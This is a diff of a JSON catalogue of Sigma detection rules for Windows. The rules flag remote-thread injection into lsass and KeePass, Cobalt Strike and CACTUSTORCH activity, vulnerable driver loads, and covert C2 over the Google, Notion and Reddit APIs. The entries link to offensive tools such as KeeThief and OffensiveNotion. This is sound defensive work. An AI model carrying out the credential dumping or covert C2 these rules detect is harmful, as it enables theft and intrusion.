- "author": "oscd.community, Natalia Shornikova",
- "creation_date": "2020/10/06",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml",
- "level": "high",
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows",
- "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fb656378-f909-47c1-8747-278bf09f4f4f",
- "value": "Potential Credential Dumping Attempt Via PowerShell Remote Thread"
- },
- {
- "description": "Detects a remote thread creation in suspicious target images",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/03/16",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "create_remote_thread_win_susp_targets.yml",
- "level": "high",
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows",
- "refs": [
- "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1055.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "41d9846c-f6af-4302-a654-24bba2729bc6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03",
- "value": "Remote Thread Creation in Suspicious Targets"
- },
- {
- "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity",
+ "description": "Detects remote thread creation in \"KeePass.exe\" which could indicates potential password dumping activity",
"meta": {
"author": "Timon Hackenjos",
"creation_date": "2022/04/22",
"falsepositive": [
"Unknown"
],
- "filename": "create_remote_thread_win_password_dumper_keepass.yml",
+ "filename": "create_remote_thread_win_keepass.yml",
"level": "high",
"logsource.category": "create_remote_thread",
"logsource.product": "windows",
"refs": [
- "https://github.com/GhostPack/KeeThief",
"https://www.cisa.gov/uscert/ncas/alerts/aa20-259a",
"https://github.com/denandz/KeeFarce",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml"
+ "https://github.com/GhostPack/KeeThief",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_keepass.yml"
],
"tags": [
"attack.credential_access",
@@ -32627,66 +32281,7 @@
}
],
"uuid": "77564cc2-7382-438b-a7f6-395c2ae53b9a",
- "value": "KeePass Password Dumping"
- },
- {
- "description": "Detects remote thread creation from CACTUSTORCH as described in references.",
- "meta": {
- "author": "@SBousseaden (detection), Thomas Patzke (rule)",
- "creation_date": "2019/02/01",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "create_remote_thread_win_cactustorch.yml",
- "level": "high",
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/mdsecactivebreach/CACTUSTORCH",
- "https://twitter.com/SBousseaden/status/1090588499517079552",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1055.012",
- "attack.execution",
- "attack.t1059.005",
- "attack.t1059.007",
- "attack.t1218.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40",
- "value": "CACTUSTORCH Remote Thread Creation"
+ "value": "Remote Thread Created In KeePass.EXE"
},
{
"description": "Detects the creation of a remote thread from a Powershell process to another process",
@@ -32696,13 +32291,13 @@
"falsepositive": [
"Unknown"
],
- "filename": "create_remote_thread_win_powershell_crt.yml",
+ "filename": "create_remote_thread_win_powershell_generic.yml",
"level": "medium",
"logsource.category": "create_remote_thread",
"logsource.product": "windows",
"refs": [
"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_crt.yml"
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_generic.yml"
],
"tags": [
"attack.execution",
@@ -32722,60 +32317,38 @@
"value": "Remote Thread Creation Via PowerShell"
},
{
- "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n",
+ "description": "Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons",
"meta": {
- "author": "Perez Diego (@darkquassar), oscd.community",
- "creation_date": "2019/10/27",
+ "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community",
+ "creation_date": "2018/11/30",
"falsepositive": [
"Unknown"
],
- "filename": "create_remote_thread_win_susp_remote_thread_source.yml",
+ "filename": "create_remote_thread_win_hktl_cobaltstrike.yml",
"level": "high",
"logsource.category": "create_remote_thread",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io",
- "Personal research, statistical analysis",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_source.yml"
+ "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f",
+ "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml"
],
"tags": [
- "attack.privilege_escalation",
"attack.defense_evasion",
- "attack.t1055"
+ "attack.t1055.001"
]
},
"related": [
{
- "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "related-to"
}
],
- "uuid": "66d31e5f-52d6-40a4-9615-002d3789a119",
- "value": "Suspicious Remote Thread Source"
- },
- {
- "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/08/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "create_remote_thread_win_susp_remote_thread_target.yml",
- "level": "medium",
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "f016c716-754a-467f-a39e-63c06f773987",
- "value": "Suspicious Remote Thread Target"
+ "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42",
+ "value": "HackTool - Potential CobaltStrike Process Injection"
},
{
"description": "Detects a remote thread creation of Ttdinject.exe used as proxy",
@@ -32843,6 +32416,133 @@
"uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee",
"value": "CreateRemoteThread API and LoadLibrary"
},
+ {
+ "description": "Detects uncommon processes creating remote threads",
+ "meta": {
+ "author": "Perez Diego (@darkquassar), oscd.community",
+ "creation_date": "2019/10/27",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "create_remote_thread_win_uncommon_source_image.yml",
+ "level": "high",
+ "logsource.category": "create_remote_thread",
+ "logsource.product": "windows",
+ "refs": [
+ "Personal research, statistical analysis",
+ "https://lolbas-project.github.io",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_uncommon_source_image.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.defense_evasion",
+ "attack.t1055"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "66d31e5f-52d6-40a4-9615-002d3789a119",
+ "value": "Remote Thread Creation By Uncommon Source Image"
+ },
+ {
+ "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"",
+ "meta": {
+ "author": "oscd.community, Natalia Shornikova",
+ "creation_date": "2020/10/06",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "create_remote_thread_win_powershell_lsass.yml",
+ "level": "high",
+ "logsource.category": "create_remote_thread",
+ "logsource.product": "windows",
+ "refs": [
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_lsass.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "fb656378-f909-47c1-8747-278bf09f4f4f",
+ "value": "Potential Credential Dumping Attempt Via PowerShell Remote Thread"
+ },
+ {
+ "description": "Detects remote thread creation from CACTUSTORCH as described in references.",
+ "meta": {
+ "author": "@SBousseaden (detection), Thomas Patzke (rule)",
+ "creation_date": "2019/02/01",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "create_remote_thread_win_hktl_cactustorch.yml",
+ "level": "high",
+ "logsource.category": "create_remote_thread",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/mdsecactivebreach/CACTUSTORCH",
+ "https://twitter.com/SBousseaden/status/1090588499517079552",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution",
+ "attack.t1055.012",
+ "attack.t1059.005",
+ "attack.t1059.007",
+ "attack.t1218.005"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40",
+ "value": "HackTool - CACTUSTORCH Remote Thread Creation"
+ },
{
"description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.",
"meta": {
@@ -32963,11 +32663,11 @@
"logsource.category": "driver_load",
"logsource.product": "windows",
"refs": [
- "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b",
"https://github.com/fengjixuchui/gdrv-loader",
- "https://twitter.com/malmoeb/status/1551449425842786306",
"https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details",
+ "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b",
"https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details",
+ "https://twitter.com/malmoeb/status/1551449425842786306",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml"
],
"tags": [
@@ -33142,8 +32842,8 @@
"logsource.category": "driver_load",
"logsource.product": "windows",
"refs": [
- "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/",
"https://reqrypt.org/windivert-doc.html",
+ "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_windivert.yml"
],
"tags": [
@@ -33343,14 +33043,13 @@
"logsource.category": "driver_load",
"logsource.product": "windows",
"refs": [
- "https://processhacker.sourceforge.io/",
"https://github.com/winsiderss/systeminformer",
+ "https://processhacker.sourceforge.io/",
"https://systeminformer.sourceforge.io/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_process_hacker.yml"
],
"tags": [
"attack.privilege_escalation",
- "cve.2021.21551",
"attack.t1543"
]
},
@@ -33413,8 +33112,8 @@
"logsource.category": "driver_load",
"logsource.product": "windows",
"refs": [
- "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities",
"https://github.com/alfarom256/CVE-2022-3699/",
+ "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml"
],
"tags": [
@@ -33549,8 +33248,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/",
"https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf",
+ "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad_network_connection.yml"
],
"tags": [
@@ -33572,6 +33271,41 @@
"uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b",
"value": "Notepad Making Network Connection"
},
+ {
+ "description": "Detects a \"winlogon.exe\" process that initiate network communications with public IP addresses",
+ "meta": {
+ "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io",
+ "creation_date": "2023/04/28",
+ "falsepositive": [
+ "Communication to other corporate systems that use IP addresses from public address spaces"
+ ],
+ "filename": "net_connection_win_winlogon_net_connections.yml",
+ "level": "medium",
+ "logsource.category": "network_connection",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_winlogon_net_connections.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution",
+ "attack.command_and_control",
+ "attack.t1218.011"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "7610a4ea-c06d-495f-a2ac-0a696abcfd3b",
+ "value": "Outbound Network Connection To Public IP Via Winlogon"
+ },
{
"description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.",
"meta": {
@@ -33585,9 +33319,9 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/",
- "https://content.fireeye.com/apt-41/rpt-apt41",
"https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html",
+ "https://content.fireeye.com/apt-41/rpt-apt41",
+ "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml"
],
"tags": [
@@ -33684,8 +33418,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html",
"https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md",
+ "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml"
],
"tags": [
@@ -33785,8 +33519,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/",
"https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/",
+ "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"
],
"tags": [
@@ -33913,8 +33647,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling",
"https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg",
+ "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml"
],
"tags": [
@@ -33992,8 +33726,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://www.ietf.org/rfc/rfc2821.txt",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp",
+ "https://www.ietf.org/rfc/rfc2821.txt",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml"
],
"tags": [
@@ -34027,11 +33761,11 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
- "https://twitter.com/M_haggis/status/1032799638213066752",
"https://twitter.com/M_haggis/status/900741347035889665",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
"https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1",
+ "https://twitter.com/M_haggis/status/1032799638213066752",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml"
],
"tags": [
@@ -34136,6 +33870,7 @@
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml"
],
"tags": [
+ "attack.persistence",
"attack.command_and_control",
"attack.t1571"
]
@@ -34165,8 +33900,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://www.poolwatch.io/coin/monero",
"https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt",
+ "https://www.poolwatch.io/coin/monero",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_crypto_mining_pools.yml"
],
"tags": [
@@ -34276,6 +34011,43 @@
"uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23",
"value": "Outbound RDP Connections Over Non-Standard Tools"
},
+ {
+ "description": "Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)",
+ "meta": {
+ "author": "Gavin Knapp",
+ "creation_date": "2023/05/01",
+ "falsepositive": [
+ "Legitimate applications communicating with the \"googleapis.com\" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning."
+ ],
+ "filename": "net_connection_win_google_api_non_browser_access.yml",
+ "level": "medium",
+ "logsource.category": "network_connection",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/looCiprian/GC2-sheet",
+ "https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/",
+ "https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/",
+ "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf",
+ "https://youtu.be/n2dFlSaBBKo",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_google_api_non_browser_access.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1102"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "7e9cf7b6-e827-11ed-a05b-0242ac120003",
+ "value": "Suspicious Non-Browser Network Communication With Google API"
+ },
{
"description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.",
"meta": {
@@ -34440,8 +34212,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/",
"https://ngrok.com/",
+ "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml"
],
"tags": [
@@ -34474,9 +34246,9 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/kleiton0x7e/status/1600567316810551296",
- "https://github.com/kleiton0x00/RedditC2",
"https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al",
+ "https://github.com/kleiton0x00/RedditC2",
+ "https://twitter.com/kleiton0x7e/status/1600567316810551296",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_reddit_api_non_browser_access.yml"
],
"tags": [
@@ -34496,6 +34268,40 @@
"uuid": "d7b09985-95a3-44be-8450-b6eadf49833e",
"value": "Suspicious Non-Browser Network Communication With Reddit API"
},
+ {
+ "description": "Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as \"OffensiveNotion C2\"",
+ "meta": {
+ "author": "Gavin Knapp",
+ "creation_date": "2023/05/03",
+ "falsepositive": [
+ "Legitimate applications communicating with the \"api.notion.com\" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured."
+ ],
+ "filename": "net_connection_win_notion_api_susp_communication.yml",
+ "level": "low",
+ "logsource.category": "network_connection",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/mttaggart/OffensiveNotion",
+ "https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notion_api_susp_communication.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1102"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "7e9cf7b6-e827-11ed-a05b-15959c120003",
+ "value": "Potentially Suspicious Network Connection To Notion API"
+ },
{
"description": "Use IMEWDBLD.exe (built-in to windows) to download a file",
"meta": {
@@ -34619,8 +34425,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/",
"https://twitter.com/forensicitguy/status/1513538712986079238",
+ "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml"
],
"tags": [
@@ -34640,6 +34446,41 @@
"uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583",
"value": "Equation Editor Network Connection"
},
+ {
+ "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.",
+ "meta": {
+ "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/24",
+ "falsepositive": [
+ "Legitimate use of the external websites for troubleshooting or network monitoring"
+ ],
+ "filename": "net_connection_win_susp_external_ip_lookup.yml",
+ "level": "medium",
+ "logsource.category": "network_connection",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md",
+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_external_ip_lookup.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1016"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "edf3485d-dac4-4d50-90e4-b0e5813f7e60",
+ "value": "Suspicious Network Connection to IP Lookup Service APIs"
+ },
{
"description": "Detects an executable that isn't dropbox but communicates with the Dropbox API",
"meta": {
@@ -34653,8 +34494,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb",
"https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east",
+ "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml"
],
"tags": "No established tags"
@@ -34675,8 +34516,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://megatools.megous.com/",
"https://www.mandiant.com/resources/russian-targeting-gov-business",
+ "https://megatools.megous.com/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml"
],
"tags": [
@@ -34696,29 +34537,6 @@
"uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4",
"value": "Communication To Mega.nz"
},
- {
- "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/29",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml",
- "level": "high",
- "logsource.category": "network_connection",
- "logsource.product": "windows",
- "refs": [
- "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_3cx_compromise_beaconing_activity.yml"
- ],
- "tags": [
- "attack.command_and_control"
- ]
- },
- "uuid": "51eecf75-d069-43c7-9ea2-63f75499edd4",
- "value": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon"
- },
{
"description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n",
"meta": {
@@ -34732,8 +34550,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml"
],
"tags": [
@@ -34776,48 +34594,6 @@
"uuid": "7047d730-036f-4f40-b9d8-1c63e36d5e62",
